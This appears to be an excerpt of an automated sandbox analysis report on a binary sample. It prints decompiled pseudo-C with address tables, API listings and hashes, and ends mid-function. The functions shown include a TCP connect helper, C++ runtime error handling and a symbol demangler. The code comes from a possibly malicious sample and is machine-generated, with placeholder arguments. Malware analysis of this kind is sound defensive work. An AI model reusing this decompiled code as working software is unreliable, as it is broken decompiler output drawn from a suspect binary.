                                                                                                                                                                                                                                                                                                        				signed char _v13;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				short _v34;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                                                                                                                        				char* _t42;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_push(6);
                                                                                                                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                                                                                                                        				_push(2);
                                                                                                                                                                                                                                                                                                        				L0400B210();
                                                                                                                                                                                                                                                                                                        				_v20 = __eax;
                                                                                                                                                                                                                                                                                                        				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                                                        					_v36 = 2;
                                                                                                                                                                                                                                                                                                        					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        					L0400B20A();
                                                                                                                                                                                                                                                                                                        					_v34 = 2;
                                                                                                                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                                                                                                                        					L0400B204();
                                                                                                                                                                                                                                                                                                        					_v12 = 2;
                                                                                                                                                                                                                                                                                                        					if(_v12 == 0) {
                                                                                                                                                                                                                                                                                                        						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                                                                                                                        					_v13 = 0;
                                                                                                                                                                                                                                                                                                        					_v40 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                                                        						_push(0x10);
                                                                                                                                                                                                                                                                                                        						_t42 =  &_v36;
                                                                                                                                                                                                                                                                                                        						_push(_t42);
                                                                                                                                                                                                                                                                                                        						_push(_v20);
                                                                                                                                                                                                                                                                                                        						L0400B1FE();
                                                                                                                                                                                                                                                                                                        						if(_t42 != 0) {
                                                                                                                                                                                                                                                                                                        							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v13 = 1;
                                                                                                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                                        							_v44 = _a16;
                                                                                                                                                                                                                                                                                                        							_push(4);
                                                                                                                                                                                                                                                                                                        							_push( &_v44);
                                                                                                                                                                                                                                                                                                        							_push(0x1005);
                                                                                                                                                                                                                                                                                                        							_push(0xffff);
                                                                                                                                                                                                                                                                                                        							_push(_v20);
                                                                                                                                                                                                                                                                                                        							L0400B1F2();
                                                                                                                                                                                                                                                                                                        							_push(4);
                                                                                                                                                                                                                                                                                                        							_push( &_v44);
                                                                                                                                                                                                                                                                                                        							_push(0x1006);
                                                                                                                                                                                                                                                                                                        							_push(0xffff);
                                                                                                                                                                                                                                                                                                        							_push(_v20);
                                                                                                                                                                                                                                                                                                        							L0400B1F2();
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						return _v20;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t40 = _v20;
                                                                                                                                                                                                                                                                                                        					_push(_t40);
                                                                                                                                                                                                                                                                                                        					L0400B1F8();
                                                                                                                                                                                                                                                                                                        					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v20;
                                                                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                                                                        0x0400a096
                                                                                                                                                                                                                                                                                                        0x0400a098
                                                                                                                                                                                                                                                                                                        0x0400a09a
                                                                                                                                                                                                                                                                                                        0x0400a09c
                                                                                                                                                                                                                                                                                                        0x0400a0a1
                                                                                                                                                                                                                                                                                                        0x0400a0a8
                                                                                                                                                                                                                                                                                                        0x0400a0b7
                                                                                                                                                                                                                                                                                                        0x0400a0bf
                                                                                                                                                                                                                                                                                                        0x0400a0c0
                                                                                                                                                                                                                                                                                                        0x0400a0c5
                                                                                                                                                                                                                                                                                                        0x0400a0cc
                                                                                                                                                                                                                                                                                                        0x0400a0cd
                                                                                                                                                                                                                                                                                                        0x0400a0d2
                                                                                                                                                                                                                                                                                                        0x0400a0d9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400a0ea
                                                                                                                                                                                                                                                                                                        0x0400a0e5
                                                                                                                                                                                                                                                                                                        0x0400a0f2
                                                                                                                                                                                                                                                                                                        0x0400a0f9
                                                                                                                                                                                                                                                                                                        0x0400a0fd
                                                                                                                                                                                                                                                                                                        0x0400a10f
                                                                                                                                                                                                                                                                                                        0x0400a117
                                                                                                                                                                                                                                                                                                        0x0400a119
                                                                                                                                                                                                                                                                                                        0x0400a11c
                                                                                                                                                                                                                                                                                                        0x0400a120
                                                                                                                                                                                                                                                                                                        0x0400a121
                                                                                                                                                                                                                                                                                                        0x0400a128
                                                                                                                                                                                                                                                                                                        0x0400a10c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400a10c
                                                                                                                                                                                                                                                                                                        0x0400a12a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400a12a
                                                                                                                                                                                                                                                                                                        0x0400a138
                                                                                                                                                                                                                                                                                                        0x0400a14c
                                                                                                                                                                                                                                                                                                        0x0400a151
                                                                                                                                                                                                                                                                                                        0x0400a154
                                                                                                                                                                                                                                                                                                        0x0400a159
                                                                                                                                                                                                                                                                                                        0x0400a15a
                                                                                                                                                                                                                                                                                                        0x0400a15f
                                                                                                                                                                                                                                                                                                        0x0400a167
                                                                                                                                                                                                                                                                                                        0x0400a168
                                                                                                                                                                                                                                                                                                        0x0400a16d
                                                                                                                                                                                                                                                                                                        0x0400a172
                                                                                                                                                                                                                                                                                                        0x0400a173
                                                                                                                                                                                                                                                                                                        0x0400a178
                                                                                                                                                                                                                                                                                                        0x0400a180
                                                                                                                                                                                                                                                                                                        0x0400a181
                                                                                                                                                                                                                                                                                                        0x0400a181
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400a186
                                                                                                                                                                                                                                                                                                        0x0400a13a
                                                                                                                                                                                                                                                                                                        0x0400a13d
                                                                                                                                                                                                                                                                                                        0x0400a13e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400a143
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 0400A09C
                                                                                                                                                                                                                                                                                                        • htons.WS2_32(?), ref: 0400A0C0
                                                                                                                                                                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 0400A0CD
                                                                                                                                                                                                                                                                                                        • connect.WS2_32(000000FF,?,00000010), ref: 0400A121
                                                                                                                                                                                                                                                                                                        • closesocket.WS2_32(000000FF), ref: 0400A13E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 530611402-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                                                        • Instruction ID: a070b3506782e3d460d1e62e3f028d70face053f71bdd0f6ca274d7f1f380b7b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65312B70B00319ABEB10EFE4D845BFEB7B5AF98314F108659E5217B2C0E7B5A940CB91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CD4
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415CFB
                                                                                                                                                                                                                                                                                                        • InterlockedExchangeAdd.KERNEL32 ref: 00415D2D
                                                                                                                                                                                                                                                                                                        • ReleaseSemaphore.KERNEL32 ref: 00415D50
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0040EEEC,0040EF44,?,?,004168B3), ref: 00415D60
                                                                                                                                                                                                                                                                                                        • InterlockedExchangeAdd.KERNEL32 ref: 00415D82
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040EEEC,0040EF44), ref: 00415D8A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$ExchangeInterlocked$EnterReleaseSemaphore
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3502810096-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6dd5b52acd2dcbba0a2293d811d726e25db9f06926b6d5bed02963caf72fdc3a
                                                                                                                                                                                                                                                                                                        • Instruction ID: c4e03dc48a609bb18e9f28535bc8b230369afd8b821da037918bb7a69205c831
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6dd5b52acd2dcbba0a2293d811d726e25db9f06926b6d5bed02963caf72fdc3a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1215175A04608CFDB00EFB8E88929EBBF0EB88351F00853AE955C3350E734A559CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 43%
                                                                                                                                                                                                                                                                                                        			E00417690(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a20, intOrPtr _a32, char* _a36, intOrPtr _a40) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                                                                                                                        				char* _t33;
                                                                                                                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                                                                        				char** _t55;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t49 = _a40;
                                                                                                                                                                                                                                                                                                        				_a20 = _a36;
                                                                                                                                                                                                                                                                                                        				_t26 = _a32;
                                                                                                                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                                                                                                                        					_t49 = _t49 - 1;
                                                                                                                                                                                                                                                                                                        					 *_t55 = _a20;
                                                                                                                                                                                                                                                                                                        					if(_t49 != 0) {
                                                                                                                                                                                                                                                                                                        						E00418140(_t47, _t52, _t53, _t54);
                                                                                                                                                                                                                                                                                                        						_a32 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        						E004183F0(_t47, _t52, _t53, _t54);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t33 =  *((intOrPtr*)( *((intOrPtr*)(E00418140(_t47, _t52, _t53, _t54))) + 8))();
                                                                                                                                                                                                                                                                                                        						_t51 = __imp___iob;
                                                                                                                                                                                                                                                                                                        						_a8 = 0xb;
                                                                                                                                                                                                                                                                                                        						_a4 = 1;
                                                                                                                                                                                                                                                                                                        						 *_t55 = "  what():  ";
                                                                                                                                                                                                                                                                                                        						_a32 = 2;
                                                                                                                                                                                                                                                                                                        						_a20 = _t33;
                                                                                                                                                                                                                                                                                                        						_t18 = _t51 + 0x40; // 0x76664640
                                                                                                                                                                                                                                                                                                        						_a12 = _t18;
                                                                                                                                                                                                                                                                                                        						fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        						_t49 = __imp___iob;
                                                                                                                                                                                                                                                                                                        						_t20 = _t49 + 0x40; // 0x76664640
                                                                                                                                                                                                                                                                                                        						_a4 = _t20;
                                                                                                                                                                                                                                                                                                        						 *_t55 = _a20;
                                                                                                                                                                                                                                                                                                        						fputs(??, ??);
                                                                                                                                                                                                                                                                                                        						 *_t55 = 0xa;
                                                                                                                                                                                                                                                                                                        						_a4 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        						fputc(??, ??);
                                                                                                                                                                                                                                                                                                        						E004183F0(_t47, _t52, _t53, _t54);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					_a32 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					abort();
                                                                                                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                                                                                                        					E004183F0(_t47, _t52, _t53, _t54);
                                                                                                                                                                                                                                                                                                        					_a32 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					 *_t55 = _a20;
                                                                                                                                                                                                                                                                                                        					E0040E810();
                                                                                                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t26 == 1) {
                                                                                                                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				asm("ud2");
                                                                                                                                                                                                                                                                                                        				_a8 = 0x2d;
                                                                                                                                                                                                                                                                                                        				_a4 = 1;
                                                                                                                                                                                                                                                                                                        				 *_t55 = "terminate called without an active exception\n";
                                                                                                                                                                                                                                                                                                        				_a12 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        				_a32 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        				fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                                                                        0x00417694
                                                                                                                                                                                                                                                                                                        0x00417698
                                                                                                                                                                                                                                                                                                        0x0041769c
                                                                                                                                                                                                                                                                                                        0x004176a2
                                                                                                                                                                                                                                                                                                        0x00417701
                                                                                                                                                                                                                                                                                                        0x00417705
                                                                                                                                                                                                                                                                                                        0x00417708
                                                                                                                                                                                                                                                                                                        0x0041770b
                                                                                                                                                                                                                                                                                                        0x00417790
                                                                                                                                                                                                                                                                                                        0x00417795
                                                                                                                                                                                                                                                                                                        0x0041779d
                                                                                                                                                                                                                                                                                                        0x0041770d
                                                                                                                                                                                                                                                                                                        0x00417716
                                                                                                                                                                                                                                                                                                        0x00417719
                                                                                                                                                                                                                                                                                                        0x0041771f
                                                                                                                                                                                                                                                                                                        0x00417727
                                                                                                                                                                                                                                                                                                        0x0041772f
                                                                                                                                                                                                                                                                                                        0x00417736
                                                                                                                                                                                                                                                                                                        0x0041773e
                                                                                                                                                                                                                                                                                                        0x00417742
                                                                                                                                                                                                                                                                                                        0x00417745
                                                                                                                                                                                                                                                                                                        0x00417749
                                                                                                                                                                                                                                                                                                        0x0041774e
                                                                                                                                                                                                                                                                                                        0x00417754
                                                                                                                                                                                                                                                                                                        0x00417757
                                                                                                                                                                                                                                                                                                        0x0041775f
                                                                                                                                                                                                                                                                                                        0x00417762
                                                                                                                                                                                                                                                                                                        0x0041776c
                                                                                                                                                                                                                                                                                                        0x00417776
                                                                                                                                                                                                                                                                                                        0x0041777a
                                                                                                                                                                                                                                                                                                        0x0041777f
                                                                                                                                                                                                                                                                                                        0x0041777f
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x004176e3
                                                                                                                                                                                                                                                                                                        0x004176e8
                                                                                                                                                                                                                                                                                                        0x004176e8
                                                                                                                                                                                                                                                                                                        0x004176f1
                                                                                                                                                                                                                                                                                                        0x004176f9
                                                                                                                                                                                                                                                                                                        0x004176fc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004176fc
                                                                                                                                                                                                                                                                                                        0x004176a7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004176a9
                                                                                                                                                                                                                                                                                                        0x004176b0
                                                                                                                                                                                                                                                                                                        0x004176b8
                                                                                                                                                                                                                                                                                                        0x004176c0
                                                                                                                                                                                                                                                                                                        0x004176ca
                                                                                                                                                                                                                                                                                                        0x004176ce
                                                                                                                                                                                                                                                                                                        0x004176d6
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: fwrite$abortfputcfputs
                                                                                                                                                                                                                                                                                                        • String ID: -
                                                                                                                                                                                                                                                                                                        • API String ID: 631181824-2547889144
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1d442c1804fa77e5723a9122c583503d7bc927b73efbeefd61df61e2df286f69
                                                                                                                                                                                                                                                                                                        • Instruction ID: e34ec58ff9fcec24660ec2e7040b0e2af75343082bb94453d7ff8c69b4f5a42c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d442c1804fa77e5723a9122c583503d7bc927b73efbeefd61df61e2df286f69
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D21C9B55083428FD304EF6AC54564EBBE0FB88718F048E2EE4D497391D779D8858B9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E0040C7DC(signed char* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                                                                        				signed char* _t93;
                                                                                                                                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                                                                                                                        				int _t111;
                                                                                                                                                                                                                                                                                                        				signed char* _t116;
                                                                                                                                                                                                                                                                                                        				signed char* _t120;
                                                                                                                                                                                                                                                                                                        				signed char* _t121;
                                                                                                                                                                                                                                                                                                        				signed int _t124;
                                                                                                                                                                                                                                                                                                        				signed int _t125;
                                                                                                                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                                                                                                                                                        				signed char* _t143;
                                                                                                                                                                                                                                                                                                        				void* _t144;
                                                                                                                                                                                                                                                                                                        				signed char* _t146;
                                                                                                                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t149;
                                                                                                                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                                                                                                                        				signed char** _t151;
                                                                                                                                                                                                                                                                                                        				void* _t154;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				 *_t149 = __ebx;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x184) = __edx;
                                                                                                                                                                                                                                                                                                        				_t76 = strlen(??);
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t147 - 0x170)) = __ebx;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x168) = 0x11;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x164) = __ebx;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x15c) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x150) = 0;
                                                                                                                                                                                                                                                                                                        				_t124 = _t76;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t147 - 0x16c)) = __ebx + _t76;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t147 - 0x158)) = _t124 + _t124;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x14c) = _t124;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x148) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x144) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x140) = 0;
                                                                                                                                                                                                                                                                                                        				_t150 = _t149 - E0040DB20(0x00000012 + (_t124 + _t124 + _t124 * 0x00000004) * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        				_t85 = E0040DB20(0x00000012 + _t124 * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        				_t129 =  *(_t147 - 0x184);
                                                                                                                                                                                                                                                                                                        				_t151 = _t150 - _t85;
                                                                                                                                                                                                                                                                                                        				_t154 = _t144 - 1;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t147 - 0x160)) = _t150 + 0xc;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x154) =  &(_t151[3]);
                                                                                                                                                                                                                                                                                                        				if(_t154 == 0) {
                                                                                                                                                                                                                                                                                                        					_t125 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t129 == 0x5f) {
                                                                                                                                                                                                                                                                                                        						_t129 =  *(__ebx + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						 *(_t147 - 0x164) = __ebx + 1;
                                                                                                                                                                                                                                                                                                        						if(_t129 == 0x5a) {
                                                                                                                                                                                                                                                                                                        							 *(_t147 - 0x164) = __ebx + 2;
                                                                                                                                                                                                                                                                                                        							_t118 = _t147 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t125 = E00406810(_t147 - 0x170, 1);
                                                                                                                                                                                                                                                                                                        							if(( *(_t147 - 0x168) & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                                                                                                                        									_t146 =  *(_t147 - 0x164);
                                                                                                                                                                                                                                                                                                        									_t129 =  *_t146 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									if(_t129 != 0x2e) {
                                                                                                                                                                                                                                                                                                        										goto L9;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_t98 = _t146[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									_t73 = _t98 - 0x61; // -7
                                                                                                                                                                                                                                                                                                        									if(_t73 <= 0x19 || _t98 == 0x5f || _t98 - 0x30 <= 9) {
                                                                                                                                                                                                                                                                                                        										_t125 = E00405190(_t118, _t125);
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t129 =  *_t146 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										goto L9;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L25:
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if(_t154 < 0 || _t144 > 3) {
                                                                                                                                                                                                                                                                                                        						_t125 = E00405ED0(_t147 - 0x170);
                                                                                                                                                                                                                                                                                                        						_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t143 = __ebx + 0xb;
                                                                                                                                                                                                                                                                                                        						 *(_t147 - 0x164) = _t143;
                                                                                                                                                                                                                                                                                                        						if( *(__ebx + 0xb) != 0x5f ||  *((char*)(__ebx + 0xc)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        							 *_t151 = _t143;
                                                                                                                                                                                                                                                                                                        							_t119 = _t147 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t127 = E00404FF0(_t147 - 0x170, strlen(??), _t143);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *(_t147 - 0x164) = __ebx + 0xd;
                                                                                                                                                                                                                                                                                                        							_t119 = _t147 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t127 = E00406810(_t147 - 0x170, 0);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t151 = 0;
                                                                                                                                                                                                                                                                                                        						_t110 = E00404F90(_t119, _t127, (0 | _t144 != 0x00000002) + 0x42);
                                                                                                                                                                                                                                                                                                        						_t120 =  *(_t147 - 0x164);
                                                                                                                                                                                                                                                                                                        						 *_t151 = _t120;
                                                                                                                                                                                                                                                                                                        						 *(_t147 - 0x184) = _t110;
                                                                                                                                                                                                                                                                                                        						_t111 = strlen(??);
                                                                                                                                                                                                                                                                                                        						_t125 =  *(_t147 - 0x184);
                                                                                                                                                                                                                                                                                                        						_t121 =  &(_t120[_t111]);
                                                                                                                                                                                                                                                                                                        						 *(_t147 - 0x164) = _t121;
                                                                                                                                                                                                                                                                                                        						_t129 =  *_t121 & 0x000000ff;
